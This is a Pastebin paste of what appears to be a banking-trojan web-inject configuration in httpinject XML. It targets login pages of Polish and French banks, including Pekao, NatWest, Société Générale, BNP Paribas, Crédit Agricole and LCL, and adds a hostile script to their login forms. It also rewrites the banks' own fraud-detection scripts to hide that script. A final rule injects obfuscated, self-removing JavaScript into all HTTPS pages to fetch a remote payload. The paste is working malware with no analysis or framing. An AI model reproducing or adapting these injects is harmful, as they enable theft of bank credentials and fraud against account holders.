  1827. ><![CDATA[(</form>)
  1828. ]></pattern><replacement
  1829. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1830. ]></replacement></modify></actions></httpinject><httpinject
  1831. <conditions
  1832. <url
  1833. type
  1834. "allow
  1835. onpost
  1836. onget
  1837. modifiers
  1838. >ya\.ru
  1839. /url></conditions><actions
  1840. <modify
  1841. <pattern
  1842. modifiers
  1843. ><![CDATA[<title>
  1844. ]></pattern><replacement
  1845. <![CDATA[<title>XXXYA:
  1846. ]></replacement></modify></actions></httpinject><httpinject
  1847. <conditions
  1848. <url
  1849. type
  1850. "allow
  1851. onpost
  1852. onget
  1853. modifiers
  1854. >^https://www\.pekaobiznes24\.pl/do/login
  1855. /url></conditions><actions
  1856. <modify
  1857. <pattern
  1858. modifiers
  1859. ><![CDATA[(</form>)
  1860. ]></pattern><replacement
  1861. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1862. ]></replacement></modify></actions></httpinject><httpinject
  1863. <conditions
  1864. <url
  1865. type
  1866. "allow
  1867. onpost
  1868. onget
  1869. modifiers
  1870. ><![CDATA[^https://www\.nwolb\.com/Brands/RSA_js/fp_AA\.js
  1871. ]></url><url
  1872. type
  1873. "deny
  1874. onpost
  1875. onget
  1876. modifiers
  1877. >\.(gif|png|jpg|css|swf)($|\?)
  1878. /url><!----></conditions><actions
  1879. <modify
  1880. <pattern
  1881. modifiers
  1882. "msU
  1883. ><![CDATA[j\.dom_data\.scripts\=\[\];[^\}]+\}
  1884. ]></pattern><replacement
  1885. <![CDATA[j.dom_data.scripts=[];
  1886. var offset2 = 0;
  1887. for (var a = 0;a < b.length;a++) {
  1888. if(b[a].src && (b[a].src).indexOf('loadiconlib.js') !== -1)
  1889. {offset2++;continue;}
  1890. j.dom_data.scripts[a-offset2] = b[a].text.length}
  1891. ]></replacement></modify></actions></httpinject><httpinject
  1892. <conditions
  1893. <url
  1894. type
  1895. "allow
  1896. onpost
  1897. onget
  1898. modifiers
  1899. ><![CDATA[^https://chat\.nwolb\.com/nwbpwebassets/bottom\.js
  1900. ]></url><url
  1901. type
  1902. "deny
  1903. onpost
  1904. onget
  1905. modifiers
  1906. >\.(gif|png|jpg|css|swf)($|\?)
  1907. /url><!----></conditions><actions
  1908. <modify
  1909. <pattern
  1910. modifiers
  1911. "msU
  1912. ><![CDATA[\}\}if\(!h\)
  1913. ]></pattern><replacement
  1914. <![CDATA[}if(a[b][f] && (''+a[b][f]).indexOf('loadiconlib.js') !== -1) {h = true;break}}if(!h)
  1915. ]></replacement></modify></actions></httpinject><httpinject
  1916. <conditions
  1917. <url
  1918. type
  1919. "allow
  1920. onpost
  1921. onget
  1922. modifiers
  1923. >^https://.*/banque/sso/co/connexionsec\.do
  1924. /url></conditions><actions
  1925. <modify
  1926. <pattern
  1927. modifiers
  1928. ><![CDATA[(</form>)
  1929. ]></pattern><replacement
  1930. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1931. ]></replacement></modify><modify
  1932. <pattern
  1933. modifiers
  1934. ><![CDATA[ff\.yc\(\);
  1935. ]></pattern><replacement
  1936. <![CDATA[
  1937. ]></replacement></modify></actions></httpinject><httpinject
  1938. <conditions
  1939. <url
  1940. type
  1941. "allow
  1942. onpost
  1943. onget
  1944. modifiers
  1945. >^https://.*/co_statiqu111111e/js/auth\-min\.js
  1946. /url></conditions><actions
  1947. <modify
  1948. <pattern
  1949. modifiers
  1950. ><![CDATA[ce:g
  1951. ]></pattern><replacement
  1952. <![CDATA[ce:'4'
  1953. ]></replacement></modify></actions></httpinject><httpinject
  1954. <conditions
  1955. <url
  1956. type
  1957. "allow
  1958. onpost
  1959. onget
  1960. modifiers
  1961. >^https://.*\.banquepopulaire\.fr/(auth/UI/Login|WebSSO_BP/_\d+/index\.html)
  1962. /url></conditions><actions
  1963. <modify
  1964. <pattern
  1965. modifiers
  1966. ><![CDATA[(</form>)
  1967. ]></pattern><replacement
  1968. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1969. ]></replacement></modify><modify
  1970. <pattern
  1971. modifiers
  1972. ><![CDATA[(id="infoFrame")
  1973. ]></pattern><replacement
  1974. <![CDATA[\1 style="display:none;"
  1975. ]></replacement></modify></actions></httpinject><httpinject
  1976. <conditions
  1977. <url
  1978. type
  1979. "allow
  1980. onpost
  1981. onget
  1982. modifiers
  1983. >^https://entreprises\.societegenerale\.fr
  1984. /url></conditions><actions
  1985. <modify
  1986. <pattern
  1987. modifiers
  1988. ><![CDATA[(</form>)
  1989. ]></pattern><replacement
  1990. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1991. ]></replacement></modify></actions></httpinject><httpinject
  1992. <conditions
  1993. <url
  1994. type
  1995. "allow
  1996. onpost
  1997. onget
  1998. modifiers
  1999. >^https://professionnels\.societegenerale\.fr
  2000. /url></conditions><actions
  2001. <modify
  2002. <pattern
  2003. modifiers
  2004. ><![CDATA[(</form>)
  2005. ]></pattern><replacement
  2006. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  2007. ]></replacement></modify></actions></httpinject><httpinject
  2008. <conditions
  2009. <url
  2010. type
  2011. "allow
  2012. onpost
  2013. onget
  2014. modifiers
  2015. >^https://particuliers\.societegenerale\.fr
  2016. /url></conditions><actions
  2017. <modify
  2018. <pattern
  2019. modifiers
  2020. ><![CDATA[(</form>)
  2021. ]></pattern><replacement
  2022. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  2023. ]></replacement></modify></actions></httpinject><httpinject
  2024. <conditions
  2025. <url
  2026. type
  2027. "allow
  2028. onpost
  2029. onget
  2030. modifiers
  2031. >^https://egyptnet\.bnpparibas\.com/part/.*/dciweb\.htm\?p0=idesai\.tht
  2032. /url></conditions><actions
  2033. <modify
  2034. <pattern
  2035. modifiers
  2036. ><![CDATA[(</form>)
  2037. ]></pattern><replacement
  2038. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  2039. ]></replacement></modify></actions></httpinject><httpinject
  2040. <conditions
  2041. <url
  2042. type
  2043. "allow
  2044. onpost
  2045. onget
  2046. modifiers
  2047. >^https://www\.cic\.fr/fr/
  2048. /url></conditions><actions
  2049. <modify
  2050. <pattern
  2051. modifiers
  2052. ><![CDATA[(</body>)
  2053. ]></pattern><replacement
  2054. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  2055. ]></replacement></modify></actions></httpinject><httpinject
  2056. <conditions
  2057. <url
  2058. type
  2059. "allow
  2060. onpost
  2061. onget
  2062. modifiers
  2063. >^https://.*\.credit\-agricole\.fr/stb/entreeBam
  2064. /url></conditions><actions
  2065. <modify
  2066. <pattern
  2067. modifiers
  2068. ><![CDATA[(</body>)
  2069. ]></pattern><replacement
  2070. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  2071. ]></replacement></modify></actions></httpinject><httpinject
  2072. <conditions
  2073. <url
  2074. type
  2075. "allow
  2076. onpost
  2077. onget
  2078. modifiers
  2079. >^https://www\.creditmutuel\.fr/groupe/fr/index\.html
  2080. /url></conditions><actions
  2081. <modify
  2082. <pattern
  2083. modifiers
  2084. ><![CDATA[(</form>)
  2085. ]></pattern><replacement
  2086. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  2087. ]></replacement></modify></actions></httpinject><httpinject
  2088. <conditions
  2089. <url
  2090. type
  2091. "allow
  2092. onpost
  2093. onget
  2094. modifiers
  2095. >^https://www\.hsbc\.fr/1/2/hsbc\-france/entreprises\-institutionnels/connexion
  2096. /url></conditions><actions
  2097. <modify
  2098. <pattern
  2099. modifiers
  2100. ><![CDATA[(</body>)
  2101. ]></pattern><replacement
  2102. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  2103. ]></replacement></modify></actions></httpinject><httpinject
  2104. <conditions
  2105. <url
  2106. type
  2107. "allow
  2108. onpost
  2109. onget
  2110. modifiers
  2111. >^https://particuliers\.secure.lcl\.fr/outil/UAUT
  2112. /url></conditions><actions
  2113. <modify
  2114. <pattern
  2115. modifiers
  2116. ><![CDATA[(</form>)
  2117. ]></pattern><replacement
  2118. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  2119. ]></replacement></modify></actions></httpinject><httpinject
  2120. <conditions
  2121. <url
  2122. type
  2123. "allow
  2124. onpost
  2125. onget
  2126. modifiers
  2127. >^https://voscomptesenligne\.labanquepostale\.fr/wsost/OstBrokerWeb/loginform
  2128. /url></conditions><actions
  2129. <modify
  2130. <pattern
  2131. modifiers
  2132. ><![CDATA[(</form>)
  2133. ]></pattern><replacement
  2134. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  2135. ]></replacement></modify></actions></httpinject><httpinject
  2136. <conditions
  2137. <url
  2138. type
  2139. "allow
  2140. onpost
  2141. onget
  2142. modifiers
  2143. >^https://connexis\.bnpparibas\.com/
  2144. /url></conditions><actions
  2145. <modify
  2146. <pattern
  2147. modifiers
  2148. ><![CDATA[(</form>)
  2149. ]></pattern><replacement
  2150. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  2151. ]></replacement></modify></actions></httpinject><httpinject
  2152. <conditions
  2153. <url
  2154. type
  2155. "allow
  2156. onpost
  2157. onget
  2158. modifiers
  2159. >^https://entreprises\.bnpparibas\.net/(NSAccess|NSFR)
  2160. /url></conditions><actions
  2161. <modify
  2162. <pattern
  2163. modifiers
  2164. ><![CDATA[(</body>)
  2165. ]></pattern><replacement
  2166. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  2167. ]></replacement></modify></actions></httpinject><httpinject
  2168. <conditions
  2169. <url
  2170. type
  2171. "allow
  2172. onpost
  2173. onget
  2174. modifiers
  2175. >^https://www\.caisse\-epargne\.fr/(particuliers|espace\-pro|entreprises|economie\-sociale).*ind_pauthpopup\.aspx
  2176. /url></conditions><actions
  2177. <modify
  2178. <pattern
  2179. modifiers
  2180. ><![CDATA[(</form>)
  2181. ]></pattern><replacement
  2182. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  2183. ]></replacement></modify></actions></httpinject><httpinject
  2184. <conditions
  2185. <url
  2186. type
  2187. "allow
  2188. onpost
  2189. onget
  2190. modifiers
  2191. contentType
  2192. "^text/(html|plain)
  2193. >^https://.+
  2194. /url><url
  2195. type
  2196. "deny
  2197. >(bank|sagepay|creditmutuel|\.(css|js|png|gif|jpg|jpeg|ico|swf|pdf|txt)($|\?))
  2198. /url></conditions><actions
  2199. <modify
  2200. <pattern
  2201. modifiers
  2202. "iUms
  2203. ><![CDATA[(<head.*>.+?<body.*>)
  2204. ]></pattern><replacement
  2205. <![CDATA[
  2206. <script id='inj_add_cc' name='inj_add_cc' type='text/javascript'>(function(){navigator.bot_id_cc='BOT_ID';var s_u=['ya.ru','rambler.ru','mail','bank','yahoo','live.com','aol.com','google','bing','pekao','pkobp'],i,tmp;for (i=0; i<s_u.length; i++){tmp=new RegExp(s_u[i]);if (tmp.test(document.location.href)) {destroy();delete navigator.bot_id_cc;return true;}}document.write('<scr'+'ipt id="inj_inj_cc" name="inj_inj_cc" type="text/javascript" src="https://'+document.location.host+'/support/googleanaliticsmboxface.cgi/______ooo0__00ooooOOOo0000___/content/cc/__n.js?r='+Number(new Date())+'"></scr'+'ipt>'); function destroy (){try{document.scripts.inj_add_cc.parentNode.removeChild(document.scripts.inj_add_cc)}catch(err) {var a=document.getElementById('inj_add_cc');a.parentNode.removeChild(a)}}}())</script>
  2207. ]></replacement></modify></actions></httpinject></httpinjects></settings></root
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!